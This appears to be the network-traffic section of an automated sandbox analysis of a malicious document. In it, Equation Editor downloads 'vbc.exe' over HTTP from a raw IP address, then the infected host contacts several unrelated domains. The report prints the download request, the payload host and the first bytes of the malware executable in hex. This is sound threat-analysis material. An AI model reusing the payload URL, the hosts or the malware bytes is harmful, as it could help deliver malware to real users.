Nov 26, 2020 21:22:24.179548025 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.179569006 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.179585934 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.179610968 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.179624081 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.179651022 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.179675102 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.179688931 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.179691076 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.179728031 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.179738998 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.179766893 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.179784060 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.179816008 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.179830074 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.179850101 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.179873943 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.179889917 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.179908991 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.179929972 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.179945946 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.179970026 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.179982901 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.180016994 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.180022001 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.180059910 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.180068016 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.180098057 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.180109978 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.180130005 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.180160046 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.180188894 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.180226088 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.180246115 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.180258989 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.180273056 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.180278063 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.180315971 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.180325031 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.180423021 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.180430889 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.183521986 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.183562994 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.183583021 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.183604002 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.183621883 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.183635950 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.183667898 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.183706045 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.183715105 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.183752060 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.183754921 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.183759928 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.183799028 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.183800936 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.183839083 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.183878899 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.183886051 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.183907986 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.183936119 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.183950901 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.183989048 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.183991909 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.184005976 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.184036970 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.184056997 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.184076071 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.184089899 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.184114933 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.184129953 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.184148073 CET	80	49165	198.23.212.188	192.168.2.22
Nov 26, 2020 21:22:24.184168100 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.184192896 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.188445091 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:22:24.670016050 CET	49165	80	192.168.2.22	198.23.212.188
Nov 26, 2020 21:23:30.719084978 CET	49166	80	192.168.2.22	34.102.136.180
Nov 26, 2020 21:23:30.735955954 CET	80	49166	34.102.136.180	192.168.2.22
Nov 26, 2020 21:23:30.736284018 CET	49166	80	192.168.2.22	34.102.136.180
Nov 26, 2020 21:23:30.736526012 CET	49166	80	192.168.2.22	34.102.136.180
Nov 26, 2020 21:23:30.753191948 CET	80	49166	34.102.136.180	192.168.2.22
Nov 26, 2020 21:23:30.852283001 CET	80	49166	34.102.136.180	192.168.2.22
Nov 26, 2020 21:23:30.852333069 CET	80	49166	34.102.136.180	192.168.2.22
Nov 26, 2020 21:23:30.852516890 CET	49166	80	192.168.2.22	34.102.136.180
Nov 26, 2020 21:23:30.852667093 CET	49166	80	192.168.2.22	34.102.136.180
Nov 26, 2020 21:23:30.869301081 CET	80	49166	34.102.136.180	192.168.2.22
Nov 26, 2020 21:23:36.047059059 CET	49167	80	192.168.2.22	104.130.255.68
Nov 26, 2020 21:23:36.179181099 CET	80	49167	104.130.255.68	192.168.2.22
Nov 26, 2020 21:23:36.179256916 CET	49167	80	192.168.2.22	104.130.255.68
Nov 26, 2020 21:23:36.179626942 CET	49167	80	192.168.2.22	104.130.255.68
Nov 26, 2020 21:23:36.311600924 CET	80	49167	104.130.255.68	192.168.2.22
Nov 26, 2020 21:23:36.311877966 CET	80	49167	104.130.255.68	192.168.2.22
Nov 26, 2020 21:23:36.311891079 CET	80	49167	104.130.255.68	192.168.2.22
Nov 26, 2020 21:23:36.311996937 CET	49167	80	192.168.2.22	104.130.255.68
Nov 26, 2020 21:23:36.312055111 CET	49167	80	192.168.2.22	104.130.255.68
Nov 26, 2020 21:23:36.446670055 CET	80	49167	104.130.255.68	192.168.2.22
Nov 26, 2020 21:23:41.659281969 CET	49168	80	192.168.2.22	154.215.9.186
Nov 26, 2020 21:23:41.919686079 CET	80	49168	154.215.9.186	192.168.2.22
Nov 26, 2020 21:23:41.920013905 CET	49168	80	192.168.2.22	154.215.9.186
Nov 26, 2020 21:23:41.920305014 CET	49168	80	192.168.2.22	154.215.9.186
Nov 26, 2020 21:23:42.188966036 CET	80	49168	154.215.9.186	192.168.2.22
Nov 26, 2020 21:23:42.189013958 CET	80	49168	154.215.9.186	192.168.2.22
Nov 26, 2020 21:23:42.189059973 CET	80	49168	154.215.9.186	192.168.2.22
Nov 26, 2020 21:23:42.189418077 CET	49168	80	192.168.2.22	154.215.9.186
Nov 26, 2020 21:23:42.189486027 CET	49168	80	192.168.2.22	154.215.9.186
Nov 26, 2020 21:23:47.581974983 CET	49169	80	192.168.2.22	101.100.209.140
Nov 26, 2020 21:23:47.764405966 CET	80	49169	101.100.209.140	192.168.2.22
Nov 26, 2020 21:23:47.764501095 CET	49169	80	192.168.2.22	101.100.209.140
Nov 26, 2020 21:23:47.764637947 CET	49169	80	192.168.2.22	101.100.209.140
Nov 26, 2020 21:23:47.947032928 CET	80	49169	101.100.209.140	192.168.2.22
Nov 26, 2020 21:23:48.785504103 CET	49169	80	192.168.2.22	101.100.209.140
Nov 26, 2020 21:23:49.007711887 CET	80	49169	101.100.209.140	192.168.2.22
Nov 26, 2020 21:23:49.936259031 CET	80	49169	101.100.209.140	192.168.2.22
Nov 26, 2020 21:23:49.936305046 CET	80	49169	101.100.209.140	192.168.2.22
Nov 26, 2020 21:23:49.936330080 CET	80	49169	101.100.209.140	192.168.2.22
Nov 26, 2020 21:23:49.936352968 CET	80	49169	101.100.209.140	192.168.2.22
Nov 26, 2020 21:23:49.936373949 CET	80	49169	101.100.209.140	192.168.2.22
Nov 26, 2020 21:23:49.936372995 CET	49169	80	192.168.2.22	101.100.209.140
Nov 26, 2020 21:23:49.936397076 CET	80	49169	101.100.209.140	192.168.2.22
Nov 26, 2020 21:23:49.936407089 CET	49169	80	192.168.2.22	101.100.209.140
Nov 26, 2020 21:23:49.936414957 CET	49169	80	192.168.2.22	101.100.209.140
Nov 26, 2020 21:23:49.936419964 CET	80	49169	101.100.209.140	192.168.2.22
Nov 26, 2020 21:23:49.936419964 CET	49169	80	192.168.2.22	101.100.209.140
Nov 26, 2020 21:23:49.936424971 CET	49169	80	192.168.2.22	101.100.209.140
Nov 26, 2020 21:23:49.936438084 CET	80	49169	101.100.209.140	192.168.2.22
Nov 26, 2020 21:23:49.936439991 CET	49169	80	192.168.2.22	101.100.209.140
Nov 26, 2020 21:23:49.936455011 CET	80	49169	101.100.209.140	192.168.2.22
Nov 26, 2020 21:23:49.936458111 CET	49169	80	192.168.2.22	101.100.209.140
Nov 26, 2020 21:23:49.936471939 CET	80	49169	101.100.209.140	192.168.2.22
Nov 26, 2020 21:23:49.936475039 CET	49169	80	192.168.2.22	101.100.209.140
Nov 26, 2020 21:23:49.936490059 CET	49169	80	192.168.2.22	101.100.209.140
Nov 26, 2020 21:23:49.936506033 CET	49169	80	192.168.2.22	101.100.209.140
Nov 26, 2020 21:23:53.943178892 CET	49170	80	192.168.2.22	74.220.199.6
Nov 26, 2020 21:23:54.112088919 CET	80	49170	74.220.199.6	192.168.2.22
Nov 26, 2020 21:23:54.112168074 CET	49170	80	192.168.2.22	74.220.199.6
Nov 26, 2020 21:23:54.112483978 CET	49170	80	192.168.2.22	74.220.199.6
Nov 26, 2020 21:23:54.281228065 CET	80	49170	74.220.199.6	192.168.2.22
Nov 26, 2020 21:23:54.282465935 CET	80	49170	74.220.199.6	192.168.2.22
Nov 26, 2020 21:23:54.282515049 CET	80	49170	74.220.199.6	192.168.2.22
Nov 26, 2020 21:23:54.282556057 CET	80	49170	74.220.199.6	192.168.2.22
Nov 26, 2020 21:23:54.282591105 CET	80	49170	74.220.199.6	192.168.2.22
Nov 26, 2020 21:23:54.282618046 CET	80	49170	74.220.199.6	192.168.2.22
Nov 26, 2020 21:23:54.282675982 CET	49170	80	192.168.2.22	74.220.199.6
Nov 26, 2020 21:23:54.284580946 CET	49170	80	192.168.2.22	74.220.199.6
Nov 26, 2020 21:23:54.284604073 CET	49170	80	192.168.2.22	74.220.199.6
Nov 26, 2020 21:23:54.501414061 CET	49170	80	192.168.2.22	74.220.199.6
Nov 26, 2020 21:23:54.670308113 CET	80	49170	74.220.199.6	192.168.2.22
Nov 26, 2020 21:23:59.582937002 CET	49171	80	192.168.2.22	198.101.172.217
Nov 26, 2020 21:23:59.705877066 CET	80	49171	198.101.172.217	192.168.2.22
Nov 26, 2020 21:23:59.706000090 CET	49171	80	192.168.2.22	198.101.172.217
Nov 26, 2020 21:23:59.706502914 CET	49171	80	192.168.2.22	198.101.172.217
Nov 26, 2020 21:23:59.829381943 CET	80	49171	198.101.172.217	192.168.2.22
Nov 26, 2020 21:23:59.829489946 CET	80	49171	198.101.172.217	192.168.2.22
Nov 26, 2020 21:23:59.829835892 CET	49171	80	192.168.2.22	198.101.172.217
Nov 26, 2020 21:23:59.829884052 CET	49171	80	192.168.2.22	198.101.172.217
Nov 26, 2020 21:23:59.952792883 CET	80	49171	198.101.172.217	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2020 21:23:30.638622999 CET	52197	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:23:30.700109959 CET	53	52197	8.8.8.8	192.168.2.22
Nov 26, 2020 21:23:35.861439943 CET	53099	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:23:36.013988972 CET	53	53099	8.8.8.8	192.168.2.22
Nov 26, 2020 21:23:41.321916103 CET	52838	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:23:41.657205105 CET	53	52838	8.8.8.8	192.168.2.22
Nov 26, 2020 21:23:47.226660013 CET	61200	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:23:47.579715014 CET	53	61200	8.8.8.8	192.168.2.22
Nov 26, 2020 21:23:53.808645964 CET	49548	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:23:53.941219091 CET	53	49548	8.8.8.8	192.168.2.22
Nov 26, 2020 21:23:59.511954069 CET	55627	53	192.168.2.22	8.8.8.8
Nov 26, 2020 21:23:59.581903934 CET	53	55627	8.8.8.8	192.168.2.22
Nov 26, 2020 21:24:09.837415934 CET	56009	53	192.168.2.22	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 26, 2020 21:23:30.638622999 CET	192.168.2.22	8.8.8.8	0xa14d	Standard query (0)	www.myecovet.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:23:35.861439943 CET	192.168.2.22	8.8.8.8	0xccff	Standard query (0)	www.snhdt.net	A (IP address)	IN (0x0001)
Nov 26, 2020 21:23:41.321916103 CET	192.168.2.22	8.8.8.8	0x2e78	Standard query (0)	www.kapkwata.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:23:47.226660013 CET	192.168.2.22	8.8.8.8	0x2f03	Standard query (0)	www.penrosecondos-official.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:23:53.808645964 CET	192.168.2.22	8.8.8.8	0x3c4e	Standard query (0)	www.teleeducationforafghanistan.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:23:59.511954069 CET	192.168.2.22	8.8.8.8	0x6ec7	Standard query (0)	www.thevirginiahomesource.com	A (IP address)	IN (0x0001)
Nov 26, 2020 21:24:09.837415934 CET	192.168.2.22	8.8.8.8	0xf09a	Standard query (0)	www.teddij.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 26, 2020 21:23:30.700109959 CET	8.8.8.8	192.168.2.22	0xa14d	No error (0)	www.myecovet.com	myecovet.com		CNAME (Canonical name)	IN (0x0001)
Nov 26, 2020 21:23:30.700109959 CET	8.8.8.8	192.168.2.22	0xa14d	No error (0)	myecovet.com		34.102.136.180	A (IP address)	IN (0x0001)
Nov 26, 2020 21:23:36.013988972 CET	8.8.8.8	192.168.2.22	0xccff	No error (0)	www.snhdt.net	reachlocal.cloudbackend.net		CNAME (Canonical name)	IN (0x0001)
Nov 26, 2020 21:23:36.013988972 CET	8.8.8.8	192.168.2.22	0xccff	No error (0)	reachlocal.cloudbackend.net		104.130.255.68	A (IP address)	IN (0x0001)
Nov 26, 2020 21:23:41.657205105 CET	8.8.8.8	192.168.2.22	0x2e78	No error (0)	www.kapkwata.com		154.215.9.186	A (IP address)	IN (0x0001)
Nov 26, 2020 21:23:47.579715014 CET	8.8.8.8	192.168.2.22	0x2f03	No error (0)	www.penrosecondos-official.com	penrosecondos-official.com		CNAME (Canonical name)	IN (0x0001)
Nov 26, 2020 21:23:47.579715014 CET	8.8.8.8	192.168.2.22	0x2f03	No error (0)	penrosecondos-official.com		101.100.209.140	A (IP address)	IN (0x0001)
Nov 26, 2020 21:23:53.941219091 CET	8.8.8.8	192.168.2.22	0x3c4e	No error (0)	www.teleeducationforafghanistan.com		74.220.199.6	A (IP address)	IN (0x0001)
Nov 26, 2020 21:23:59.581903934 CET	8.8.8.8	192.168.2.22	0x6ec7	No error (0)	www.thevirginiahomesource.com	thevirginiahomesource.com		CNAME (Canonical name)	IN (0x0001)
Nov 26, 2020 21:23:59.581903934 CET	8.8.8.8	192.168.2.22	0x6ec7	No error (0)	thevirginiahomesource.com		198.101.172.217	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

198.23.212.188

www.myecovet.com

www.snhdt.net

www.kapkwata.com

www.penrosecondos-official.com

www.teleeducationforafghanistan.com

www.thevirginiahomesource.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	198.23.212.188	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Nov 26, 2020 21:22:23.104727983 CET	0	OUT	GET /reg/vbc.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 198.23.212.188 Connection: Keep-Alive
Nov 26, 2020 21:22:23.224294901 CET	1	IN	HTTP/1.1 200 OK Date: Thu, 26 Nov 2020 20:22:22 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.11 Last-Modified: Thu, 26 Nov 2020 15:58:02 GMT ETag: "79a00-5b5049bd7f7fe" Accept-Ranges: bytes Content-Length: 498176 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 cb bf 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 8e 07 00 00 0a 00 00 00 00 00 00 26 ac 07 00 00 20 00 00 00 c0 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 ab 07 00 4f 00 00 00 00 c0 07 00 14 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5c 8c 07 00 00 20 00 00 00 8e 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 14 06 00 00 00 c0 07 00 00 08 00 00 00 90 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 07 00 00 02 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 ac 07 00 00 00 00 00 48 00 00 00 02 00 05 00 48 9a 00 00 94 85 00 00 03 00 00 00 8c 00 00 06 dc 1f 01 00 f8 8b 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 09 00 00 04 0a 06 0b 07 03 28 16 00 00 0a 74 11 00 00 01 0c 02 7c 09 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 09 00 00 04 0a 06 0b 07 03 28 18 00 00 0a 74 11 00 00 01 0c 02 7c 09 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 0a 00 00 04 0a 06 0b 07 03 28 16 00 00 0a 74 11 00 00 01 0c 02 7c 0a 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 0a 00 00 04 0a 06 0b 07 03 28 18 00 00 0a 74 11 00 00 01 0c 02 7c 0a 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 9a 02 73 19 00 00 0a 7d 07 00 00 04 02 7e 1a 00 00 0a 7d 08 00 00 04 02 28 1b 00 00 0a 00 00 02 28 07 00 00 06 00 2a 1b 30 01 00 14 00 00 00 00 00 00 00 00 00 02 28 08 00 00 06 00 de 08 02 28 0f 00 00 0a 00 dc 2a 01 10 00 00 02 00 01 00 0a 0b 00 08 00 00 00 00 13 30 05 00 34 00 00 00 02 00 00 11 00 72 01 00 00 70 28 0d 00 00 06 0a 02 02 fe 06 09 00 00 06 73 c2 00 00 06 7d 01 00 00 04 02 1f 0d 02 7b 01 00 00 04 06 16 28 0a 00 00 06 7d 08 00 00 04 2a 3a 00 02 7b 08 00 00 04 28 0b 00 00 06 26 2a 00 13 30 04 00 c0 00 00 00 03 00 00 11 00 03 16 fe 04 16 fe 01 0a 06 39 9c 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL$_0& @ @O H.text\ `.rsrc@@.reloc@BHH0){(t\|(+30){(t\|(+30){(t\|(+30){(t\|(+3s}~}((0((04rp(s}{(}:{(&09
Nov 26, 2020 21:22:23.224359989 CET	3	IN	Data Raw: 05 7b b3 00 00 04 0b 02 7b 07 00 00 04 07 6f 1c 00 00 0a 0c 08 39 80 00 00 00 00 07 73 1d 00 00 0a 0d 04 20 00 01 00 00 2e 08 04 20 04 01 00 00 33 0b 02 7b 09 00 00 04 14 fe 03 2b 01 16 13 04 11 04 2c 12 00 02 7b 09 00 00 04 02 09 6f 1e 00 00 0a Data Ascii: {{o9s . 3{+,{o+2 . 3{+,{oo,+{(+*0~o o!,rpr3p("&8\s#%r
Nov 26, 2020 21:22:23.224399090 CET	4	IN	Data Raw: 00 70 28 2f 00 00 0a 2c 0d 09 72 c5 00 00 70 28 2f 00 00 0a 2b 01 16 13 07 11 07 2c 23 00 72 cf 00 00 70 72 3f 01 00 70 16 1f 10 28 22 00 00 0a 26 08 6f 30 00 00 0a 00 16 13 05 38 ad 00 00 00 09 72 b9 00 00 70 28 48 00 00 0a 13 08 11 08 2c 09 00 Data Ascii: p(/,rp(/+,#rpr?p("&o08rp(H,8sIsJ+ioKrp(H,+Krpo4rp(;(H,++oL(M,oNoO++oP+*
Nov 26, 2020 21:22:23.224436998 CET	5	IN	Data Raw: 00 04 6f 5a 00 00 0a 02 7b 1a 00 00 04 6f 5a 00 00 0a 02 7b 16 00 00 04 6f 5a 00 00 0a 02 7b 19 00 00 04 6f 5a 00 00 0a 28 29 00 00 06 16 fe 01 0c 08 2c 05 38 8b 01 00 00 06 02 7b 22 00 00 04 6f 60 00 00 0a 02 7b 13 00 00 04 6f 61 00 00 0a 7d b8 Data Ascii: oZ{oZ{oZ{oZ(),8{"o`{oa}{obr2poc{ oZof{obrHpoc{oZof{obr\poc{oZof{obrhpoc{oZof~
Nov 26, 2020 21:22:23.342739105 CET	7	IN	Data Raw: 0a 73 77 00 00 0a 0a 73 78 00 00 0a 0b 02 73 79 00 00 0a 7d 16 00 00 04 02 73 7a 00 00 0a 7d 17 00 00 04 02 73 7a 00 00 0a 7d 18 00 00 04 02 73 79 00 00 0a 7d 19 00 00 04 02 73 79 00 00 0a 7d 1a 00 00 04 02 73 7b 00 00 0a 7d 1b 00 00 04 02 73 7a Data Ascii: swsxsy}sz}sz}sy}sy}s{}sz}s{}sz}s{}sy} s{}!s\|}"s}}#s}}$s}}%s}}&s{}'s{}({"o~{#o
Nov 26, 2020 21:22:23.342808008 CET	8	IN	Data Raw: 7b 24 00 00 04 6f 92 00 00 0a 02 7b 18 00 00 04 16 18 6f 93 00 00 0a 00 02 7b 24 00 00 04 6f 92 00 00 0a 02 7b 17 00 00 04 16 19 6f 93 00 00 0a 00 02 7b 24 00 00 04 6f 92 00 00 0a 02 7b 25 00 00 04 17 1a 6f 93 00 00 0a 00 02 7b 24 00 00 04 6f 92 Data Ascii: {$o{o{$o{o{$o{%o{$o{&o{$r6po{%rNpo{%o{o{%o{!o{%o{o{%o{o{%rN
Nov 26, 2020 21:22:23.342848063 CET	10	IN	Data Raw: 00 04 02 73 79 00 00 0a 7d 2f 00 00 04 02 28 7f 00 00 0a 00 02 7b 2a 00 00 04 17 6f aa 00 00 0a 00 02 7b 2a 00 00 04 1f 0c 20 f1 00 00 00 73 ab 00 00 0a 6f ac 00 00 0a 00 02 7b 2a 00 00 04 72 96 0a 00 70 6f 81 00 00 0a 00 02 7b 2a 00 00 04 20 db Data Ascii: sy}/({o{ so{rpo{ so{*o{+o{+so{+rpo{+ so{+o{, so{,rpo
Nov 26, 2020 21:22:23.342885971 CET	11	IN	Data Raw: 6f bc 00 00 0a 18 22 00 00 c8 41 73 bd 00 00 0a 6f be 00 00 0a 26 02 7b 32 00 00 04 6f 92 00 00 0a 02 7b 31 00 00 04 17 17 6f 93 00 00 0a 00 02 7b 32 00 00 04 1b 6f b8 00 00 0a 00 02 7b 32 00 00 04 16 16 73 ab 00 00 0a 6f ac 00 00 0a 00 02 7b 32 Data Ascii: o"Aso&{2o{1o{2o{2so{2rpo{2o{2o"Aso&{2o"HBso&{2o"Aso&{2 so{2o"@"`
Nov 26, 2020 21:22:23.342926025 CET	12	IN	Data Raw: 72 0a 0c 00 70 6f 81 00 00 0a 00 02 7b 35 00 00 04 1f 1f 1f 11 73 ad 00 00 0a 6f ae 00 00 0a 00 02 7b 35 00 00 04 17 6f af 00 00 0a 00 02 7b 35 00 00 04 17 6f d7 00 00 0a 00 02 7b 35 00 00 04 72 16 0d 00 70 6f 65 00 00 0a 00 02 7b 35 00 00 04 17 Data Ascii: rpo{5so{5o{5o{5rpoe{5o{6o{6Cso{6r$po{6so{6o{6o{6rpoe{6o{7o{5o{7
Nov 26, 2020 21:22:23.342964888 CET	14	IN	Data Raw: 00 0a 00 02 7b 37 00 00 04 16 6f 9b 00 00 0a 00 02 7b 37 00 00 04 6f 9c 00 00 0a 00 02 7b 38 00 00 04 16 6f 9b 00 00 0a 00 02 7b 38 00 00 04 6f 9c 00 00 0a 00 02 16 28 9b 00 00 0a 00 2a 5e 02 14 7d 3e 00 00 04 02 28 52 00 00 0a 00 00 02 28 48 00 Data Ascii: {7o{7o{8o{8o(^}>(R(H0+,{>+,{>o=(v*0]("@"PAs(( l s(rp(rpoe(
Nov 26, 2020 21:22:23.343014956 CET	15	IN	Data Raw: 70 6f e5 00 00 0a 72 e8 02 00 70 28 2f 00 00 0a 13 08 11 08 2c 25 02 7b 65 00 00 04 28 e4 00 00 0a 72 a6 0e 00 70 6f e5 00 00 0a 28 e9 00 00 0a 28 ea 00 00 0a 6f eb 00 00 0a 00 28 e4 00 00 0a 72 c0 0e 00 70 6f e5 00 00 0a 72 e8 02 00 70 28 2f 00 Data Ascii: porp(/,%{e(rpo((o(rporp(/,'{\(rpo((o(rporp(/,'{](rpo((o(rporp(/, {_(r

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
